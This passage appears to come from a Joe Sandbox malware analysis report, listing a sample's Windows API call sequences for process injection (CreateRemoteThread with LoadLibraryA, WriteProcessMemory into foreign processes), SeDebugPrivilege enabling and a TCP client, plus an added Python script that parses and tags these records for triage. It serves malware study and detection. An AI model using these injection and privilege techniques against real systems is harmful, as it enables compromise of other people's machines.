                                                                                  • WriteProcessMemory.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 6A6E0250
                                                                                  • VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000), ref: 6A6E0263
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6A6E026A
                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,LoadLibraryA), ref: 6A6E0286
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 6A6E028D
                                                                                  • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6A6E02A2
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6A6E02B3
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6A6E02B6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Virtual$HandleMemory$CloseProcess$AllocateFreeInformationOpenQuerySystem$AddressAdjustAllocCreateModulePrivilegeProcRemoteThreadWrite
                                                                                  • String ID: LoadLibraryA$kernel32.dll
                                                                                  • API String ID: 3042910503-2572683754
                                                                                  • Opcode ID: bc314826b20b0fe335bd21a72090c2db6745bdff557517e6b1cc97605802fb38
                                                                                  • Instruction ID: c59c7ea55345cb1f036813b64a795693a37741954e52897170c29ce6e85ae662
                                                                                  • Opcode Fuzzy Hash: bc314826b20b0fe335bd21a72090c2db6745bdff557517e6b1cc97605802fb38
                                                                                  • Instruction Fuzzy Hash: AB21E7313852557FE61116E69C0AFAB37ECEF82B52F1A0074FE11DA180DE60AD054AA9
                                                                                  APIs
                                                                                    • Part of subcall function 6A6DDAF0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,001F0FFF), ref: 6A6DDB0B
                                                                                  • ZwOpenProcess.NTDLL ref: 6A6DDC18
                                                                                  • ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004), ref: 6A6DDC3E
                                                                                  • ZwQuerySystemInformation.NTDLL(00000010,?,?,?), ref: 6A6DDC57
                                                                                  • ZwFreeVirtualMemory.NTDLL(000000FF,001FFFFF,001FFFFF,00008000), ref: 6A6DDC71
                                                                                  • ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004), ref: 6A6DDC9A
                                                                                  • ZwQuerySystemInformation.NTDLL(00000010,?,?,?), ref: 6A6DDCAD
                                                                                  • ZwDuplicateObject.NTDLL(001FFFFF,?,000000FF,?,00000000,00000000,00000002), ref: 6A6DDCE3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: MemoryVirtual$AllocateInformationQuerySystem$CreateDuplicateFreeObjectOpenProcessSnapshotToolhelp32
                                                                                  • String ID:
                                                                                  • API String ID: 3499649989-0
                                                                                  • Opcode ID: 989422642f1a3788cca4d46365fc6468cf5fc8763ffeb3d05c1cdf4fb0a0cbde
                                                                                  • Instruction ID: 272973e0f65f06ca9e360e87f35e78bb4b7f3fe1780bd36c0f5f8628be7b2541
                                                                                  • Opcode Fuzzy Hash: 989422642f1a3788cca4d46365fc6468cf5fc8763ffeb3d05c1cdf4fb0a0cbde
                                                                                  • Instruction Fuzzy Hash: EB515DB1508304AFD700DF95C880D6BB7E9FBC9B58F544A2DF6A592290DB70E905CF62
APIs
  • Part of subcall function 6A6E4A40: socket.WS2_32(00000002,00000001,00000000), ref: 6A6E4A65
  • Part of subcall function 6A6E4A40: ioctlsocket.WS2_32 ref: 6A6E4A81
  • Part of subcall function 6A6E4A40: htons.WS2_32(?), ref: 6A6E4AB1
  • Part of subcall function 6A6E4A40: inet_addr.WS2_32(?), ref: 6A6E4AE5
  • Part of subcall function 6A6E4A40: connect.WS2_32(?,?,00000010), ref: 6A6E4B00
• _memset.LIBCMT ref: 6A6E533D
• _memset.LIBCMT ref: 6A6E535A
  • Part of subcall function 6A6E46C0: _memset.LIBCMT ref: 6A6E46F0
  • Part of subcall function 6A6E46C0: _swscanf.LIBCMT ref: 6A6E4739
• closesocket.WS2_32(?), ref: 6A6E5404
• closesocket.WS2_32(?), ref: 6A6E5433
  • Part of subcall function 6A6E4D60: _memset.LIBCMT ref: 6A6E4DB1
  • Part of subcall function 6A6E4D60: select.WS2_32 ref: 6A6E4DED
• closesocket.WS2_32(?), ref: 6A6E5464
• closesocket.WS2_32(?), ref: 6A6E5493
Strings
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
• Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: _memsetclosesocket$_swscanfconnecthtonsinet_addrioctlsocketselectsocket
• String ID: P
• API String ID: 1656721356-3110715001
• Opcode ID: 54aca513506525698ac622a62b22ef08e5c0574b0e09300694200639f2704aff
• Instruction ID: 3a912d2db1bb36f3172fea4c26a1e9e839990d8dd89803e1ed5568cfb6419e22
• Opcode Fuzzy Hash: 54aca513506525698ac622a62b22ef08e5c0574b0e09300694200639f2704aff
• Instruction Fuzzy Hash: 8C51C3716093419FD720CF64D498ADBB7E4BF85309F45892DE489C7142EF71E50E8B91
APIs
• __EH_prolog3_GS.LIBCMT ref: 6A6FB295
• GetFullPathNameA.KERNEL32(00000000,00000104,00000000,?,00000158,6A6FB51A,?,00000000,?,00000000,00000104,00000000,00000000,?,?), ref: 6A6FB2D3
  • Part of subcall function 6A6EE232: __CxxThrowException@8.LIBCMT ref: 6A6EE248
  • Part of subcall function 6A6EE232: __EH_prolog3.LIBCMT ref: 6A6EE255
• PathIsUNCA.SHLWAPI(?,00000000,?,?,?), ref: 6A6FB343
• GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,?), ref: 6A6FB36A
• CharUpperA.USER32(00000000), ref: 6A6FB39D
• FindFirstFileA.KERNEL32(?,?), ref: 6A6FB3B9
• FindClose.KERNEL32(00000000), ref: 6A6FB3C5
• lstrlenA.KERNEL32(?), ref: 6A6FB3E3
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
• Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3H_prolog3_InformationNameThrowUpperVolumelstrlen
• String ID:
• API String ID: 624941980-0
• Opcode ID: 2e8c370219861b2d25818923ea1e3c0cd33affc25a419a8a055cd0bbbf884c3b
• Instruction ID: bbf59f378898b7b454193caf0ef9ec0506b9cfb6c5785e2e8424735ecd9b26b7
• Opcode Fuzzy Hash: 2e8c370219861b2d25818923ea1e3c0cd33affc25a419a8a055cd0bbbf884c3b
• Instruction Fuzzy Hash: 5241B171904619EFDF109FA0CC8CBEE77B9EF41319F0509A8E819A5292DF348E86CE10
APIs
• _memset.LIBCMT ref: 6A6D5FCF
• _memset.LIBCMT ref: 6A6D5FE3
• _memset.LIBCMT ref: 6A6D5FFD
  • Part of subcall function 6A6D5160: LoadLibraryA.KERNEL32(version.dll,?,?,00000000), ref: 6A6D519C
  • Part of subcall function 6A6D5560: CoCreateInstance.OLE32(6A71AF30,00000000,00000001,6A71AF20,46D8D1FB), ref: 6A6D5586
Strings
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
• Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: _memset$CreateInstanceLibraryLoad
• String ID: ...$.....$0.0
• API String ID: 1730192913-2035250324
• Opcode ID: a5379387f9af0408a04c3047bdde5537fe1508c1ef002fa0aa77daa5da428861
• Instruction ID: 75aabc861aaf38448c26e8ae71559d7ea78affd5e0cd7b3da1c689943d63b664
• Opcode Fuzzy Hash: a5379387f9af0408a04c3047bdde5537fe1508c1ef002fa0aa77daa5da428861
• Instruction Fuzzy Hash: 59E1897A61834057C72597B49C91BEBB3EA5FD824DF890C2DE418C62A2FF39E309C152
APIs
• LoadLibraryA.KERNEL32 ref: 6A6D8360
• GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6A6D8372
• ReadProcessMemory.KERNEL32(?,00000000,00000000,00000004,00000000), ref: 6A6D838E
• FreeLibrary.KERNEL32(00000000), ref: 6A6D83A5
Strings
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
• Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: Library$AddressFreeLoadMemoryProcProcessRead
• String ID: ShowWindow$user32.dll
• API String ID: 4079270797-767597475
• Opcode ID: e93db6ec46dc4d123a1a5c7441f598a740e8b052b97293e07f1675d047923b99
• Instruction ID: 4a555dd7398575d25ab1fb63e41baf6db3fed2ebccfe8dae1c3370732cb40c61
• Opcode Fuzzy Hash: e93db6ec46dc4d123a1a5c7441f598a740e8b052b97293e07f1675d047923b99
• Instruction Fuzzy Hash: 1CF0A931609380ABDB10DBAACC48E5B7BF8AFC5651F09892DF558D3160DB34CD09CB66
APIs
• OpenProcessToken.ADVAPI32(00000000,000F01FF,?,?,?,?,6A6D11E6), ref: 6A6E00FE
• LookupPrivilegeValueA.ADVAPI32 ref: 6A6E0124
• CloseHandle.KERNEL32(?), ref: 6A6E0133
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 6A6E0151
• CloseHandle.KERNEL32(?), ref: 6A6E0160
Strings
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
• Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: CloseHandleToken$AdjustLookupOpenPrivilegePrivilegesProcessValue
• String ID: SeDebugPrivilege
• API String ID: 837837241-2896544425
• Opcode ID: 894f26c74353f8ca8276abda0351b0cc7fcd017deddcb3c209edaa37205a5273
• Instruction ID: 9c0058e49b9f178106e8cc35ce11e4ccede99a0283a7047e2a4d96d44308ace6
• Opcode Fuzzy Hash: 894f26c74353f8ca8276abda0351b0cc7fcd017deddcb3c209edaa37205a5273
• Instruction Fuzzy Hash: 7B0149743443016BE704DFA1CD4AF5B77E8BB84B01F85495CB545DA180EBB5DD04DB62
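Three of the function records above carry the API sequences an analyst reads off this report by hand: the 6A6E4A40/6A6E5404 record (socket(2,1,0), which is AF_INET/SOCK_STREAM, then ioctlsocket, connect with a 0x10-byte sockaddr_in and a select in a subcall), the 6A6D8360 record (GetProcAddress of user32!ShowWindow followed by a 4-byte ReadProcessMemory in a foreign process) and the 6A6E00FE record (OpenProcessToken with access mask 000F01FF, which is TOKEN_ALL_ACCESS, then LookupPrivilegeValueA and AdjustTokenPrivileges with the SeDebugPrivilege string). The script below is an added triage helper written for this page; it is not part of the Joe Sandbox report or of the analysed sample. It parses records in the report's textual "APIs" / "String ID" layout and tags them with those behaviours. The input is a constructed excerpt modelled on the three records, the tag names are the example's own, and reading ioctlsocket plus select as a non-blocking connect with a timeout is an interpretation, not something the report states.

```python
"""Triage helper for Joe Sandbox 'APIs' function records (added example, not report code)."""
import re
from dataclasses import dataclass, field

# Constructed excerpt modelled on three records of the report; not a verbatim copy of its tables.
SAMPLE_REPORT = """\
APIs
• LoadLibraryA.KERNEL32 ref: 6A6D8360
• GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6A6D8372
• ReadProcessMemory.KERNEL32(?,00000000,00000000,00000004,00000000), ref: 6A6D838E
• FreeLibrary.KERNEL32(00000000), ref: 6A6D83A5
Strings
Similarity
• API ID: Library$AddressFreeLoadMemoryProcProcessRead
• String ID: ShowWindow$user32.dll
APIs
• OpenProcessToken.ADVAPI32(00000000,000F01FF,?,?,?,?,6A6D11E6), ref: 6A6E00FE
• LookupPrivilegeValueA.ADVAPI32 ref: 6A6E0124
• CloseHandle.KERNEL32(?), ref: 6A6E0133
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 6A6E0151
• CloseHandle.KERNEL32(?), ref: 6A6E0160
Similarity
• String ID: SeDebugPrivilege
APIs
  • Part of subcall function 6A6E4A40: socket.WS2_32(00000002,00000001,00000000), ref: 6A6E4A65
  • Part of subcall function 6A6E4A40: ioctlsocket.WS2_32 ref: 6A6E4A81
  • Part of subcall function 6A6E4A40: connect.WS2_32(?,?,00000010), ref: 6A6E4B00
• closesocket.WS2_32(?), ref: 6A6E5404
  • Part of subcall function 6A6E4D60: select.WS2_32 ref: 6A6E4DED
Similarity
• String ID: P
"""

# One API line: optional "Part of subcall function XXXX:", then Api.MODULE(args), ref: ADDR
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>[A-Za-z_0-9@]+)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)")
STR_RE = re.compile(r"^\s*•\s*String ID:\s*(?P<s>.*)$")

TOKEN_ALL_ACCESS = "000F01FF"   # Windows access mask, as printed by the report


@dataclass
class FuncRecord:
    entry: str = ""                            # ref of first direct (non-subcall) call
    calls: list = field(default_factory=list)  # (api, module, args, direct, ref)
    strings: list = field(default_factory=list)

    @property
    def apis(self):
        return {c[0] for c in self.calls}


def parse_records(text):
    """Split report text into FuncRecords; each 'APIs' heading starts a new record."""
    records, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = FuncRecord()
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            direct = m["sub"] is None
            cur.calls.append((m["api"], m["mod"], args, direct, m["ref"]))
            if direct and not cur.entry:
                cur.entry = m["ref"]
            continue
        m = STR_RE.match(line)
        if m and m["s"]:
            cur.strings.extend(m["s"].split("$"))  # report joins strings with '$'
    for r in records:
        if not r.entry and r.calls:           # only subcall lines: fall back to first ref
            r.entry = r.calls[0][4]
    return records


def classify(r):
    """Tag a record with behaviours; tag names are this example's own."""
    tags, a = [], r.apis
    if {"OpenProcessToken", "AdjustTokenPrivileges"} <= a and any(
            x.startswith("LookupPrivilegeValue") for x in a):
        privs = [s for s in r.strings if s.startswith("Se") and s.endswith("Privilege")]
        tags.append("enable-privilege:" + ",".join(privs or ["?"]))
        if any(c[0] == "OpenProcessToken" and len(c[2]) > 1
               and c[2][1].upper() == TOKEN_ALL_ACCESS for c in r.calls):
            tags.append("token-access:TOKEN_ALL_ACCESS")
    if {"GetProcAddress", "ReadProcessMemory"} <= a:
        exports = [s for s in r.strings if not s.lower().endswith(".dll")]
        tags.append("remote-read-of-export:" + ",".join(exports or ["?"]))
    if {"socket", "connect"} <= a:
        fam = "?"
        if any(c[0] == "socket" and c[2][:2] == ["00000002", "00000001"] for c in r.calls):
            fam = "AF_INET/SOCK_STREAM"
        tags.append("tcp-client:" + fam)
        if {"ioctlsocket", "select"} <= a:   # interpretation: non-blocking connect + timeout
            tags.append("nonblocking-connect-with-select")
    return tags


def triage(text):
    """Map each record's entry address to its behaviour tags."""
    return {r.entry: classify(r) for r in parse_records(text)}


if __name__ == "__main__":
    for entry, tags in triage(SAMPLE_REPORT).items():
        print(entry, tags)
```

Run against a saved copy of the report's function tables, the rules pick out the privilege-enabling and foreign-memory-reading functions that the head-of-report signatures ("Writes to foreign memory regions", "Injects a PE file into a foreign processes") are built on; new rules are one set comparison plus an optional string check each.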
                                                                                  APIs
                                                                                    • Part of subcall function 0BE93C00: GetKeyboardType.USER32(00000000), ref: 0BE93C05
                                                                                    • Part of subcall function 0BE93C00: GetKeyboardType.USER32(00000001), ref: 0BE93C11
                                                                                  • GetCommandLineA.KERNEL32 ref: 0BE96E7B
                                                                                  • GetVersion.KERNEL32 ref: 0BE96E8F
                                                                                  • GetVersion.KERNEL32 ref: 0BE96EA0
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0BE96EDC
                                                                                    • Part of subcall function 0BE93C30: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0BE93C52
                                                                                    • Part of subcall function 0BE93C30: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,0BE93CA1,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0BE93C85
                                                                                    • Part of subcall function 0BE93C30: RegCloseKey.ADVAPI32(?,0BE93CA8,00000000,?,00000004,00000000,0BE93CA1,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0BE93C9B
                                                                                  • GetThreadLocale.KERNEL32 ref: 0BE96EBC
                                                                                    • Part of subcall function 0BE96D4C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0BE96DB2), ref: 0BE96D72
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3734044017-0
                                                                                  • Opcode ID: 4bc3b0e318a25f15ac87b1ccbdfc1398bcc1da483c9f511846e6da48d3b550b4
                                                                                  • Instruction ID: 4d629106add76f4158e27f98887a6750597602354db368b141eccf9423c494e3
                                                                                  • Opcode Fuzzy Hash: 4bc3b0e318a25f15ac87b1ccbdfc1398bcc1da483c9f511846e6da48d3b550b4
                                                                                  • Instruction Fuzzy Hash: E2012DA0814347EDEF10FB72F04634C3AE1AB91785F05755AC1229A640E73DC30C9B6B
                                                                                  APIs
                                                                                  • VirtualProtectEx.KERNEL32 ref: 6A6E6F44
                                                                                  • WriteProcessMemory.KERNEL32(00000000,00000000,6A6E6E70,00000030), ref: 6A6E6F5B
                                                                                  • VirtualProtectEx.KERNEL32(00000000,00000000,00000030,?,?), ref: 6A6E6F6E
                                                                                  • VirtualAllocEx.KERNEL32(00000000,00000000,00000030,00001000,00000040,00000000,6A6D3421,00000000), ref: 6A6E6F8C
                                                                                  • WriteProcessMemory.KERNEL32 ref: 6A6E6FA7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Virtual$MemoryProcessProtectWrite$Alloc
                                                                                  • String ID:
                                                                                  • API String ID: 3771146588-0
                                                                                  • Opcode ID: 3db2fcea71859a86ac6997f9045e1e7f0f0dfc798e7f81595a425aa0be85afff
                                                                                  • Instruction ID: f60d6710bc02fc62f2ced4ceaa366d19da7920ba16997cfb98191824b29776e6
                                                                                  • Opcode Fuzzy Hash: 3db2fcea71859a86ac6997f9045e1e7f0f0dfc798e7f81595a425aa0be85afff
                                                                                  • Instruction Fuzzy Hash: 9F01D6B500D3157AE6009A56CC49FF7BBFCEF82A96F404518FB48A10C0DA746D488BB5
                                                                                  APIs
                                                                                    • Part of subcall function 6A6FA9DA: GetWindowLongA.USER32(?,000000F0), ref: 6A6FA9E5
                                                                                  • GetKeyState.USER32(00000010), ref: 6A6F8264
                                                                                  • GetKeyState.USER32(00000011), ref: 6A6F826D
                                                                                  • GetKeyState.USER32(00000012), ref: 6A6F8276
                                                                                  • SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 6A6F828C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: State$LongMessageSendWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1063413437-0
                                                                                  • Opcode ID: 0b2d0e059ae80a3ccda46e4d77646038718ae3e43b4f4ef10a4eb308f6c15532
                                                                                  • Instruction ID: 0c3332e2f9e281dcc65fc440f2218e7c098221d883240a4c4180f8830980baf2
                                                                                  • Opcode Fuzzy Hash: 0b2d0e059ae80a3ccda46e4d77646038718ae3e43b4f4ef10a4eb308f6c15532
                                                                                  • Instruction Fuzzy Hash: CFF02E35351B8B2AFE1426B68C05FE50E575FA1BD4F020CB1AB45EB0E6CE90D80365F4
                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 6A6D3C5C
                                                                                  • Sleep.KERNEL32(000003E8,?,?,?,?,?,6A6D3D05), ref: 6A6D3C75
                                                                                  • GetTickCount.KERNEL32 ref: 6A6D3C7B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CountTick$Sleep
                                                                                  • String ID:
                                                                                  • API String ID: 4250438611-0
                                                                                  • Opcode ID: 8dbbcdb1ec05e1188633edaefd29bfcf205f28edaaa255efab2b1a36a9b1c979
                                                                                  • Instruction ID: f6046c5079647d9c046ad79077ffc6b250030ba2dc92402fe60c674a1a6d54e5
                                                                                  • Opcode Fuzzy Hash: 8dbbcdb1ec05e1188633edaefd29bfcf205f28edaaa255efab2b1a36a9b1c979
                                                                                  • Instruction Fuzzy Hash: FF1148B08057459BC330BF79C999216FAD4AF42380B09C93DD4D687261EF30E840EB52
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID:
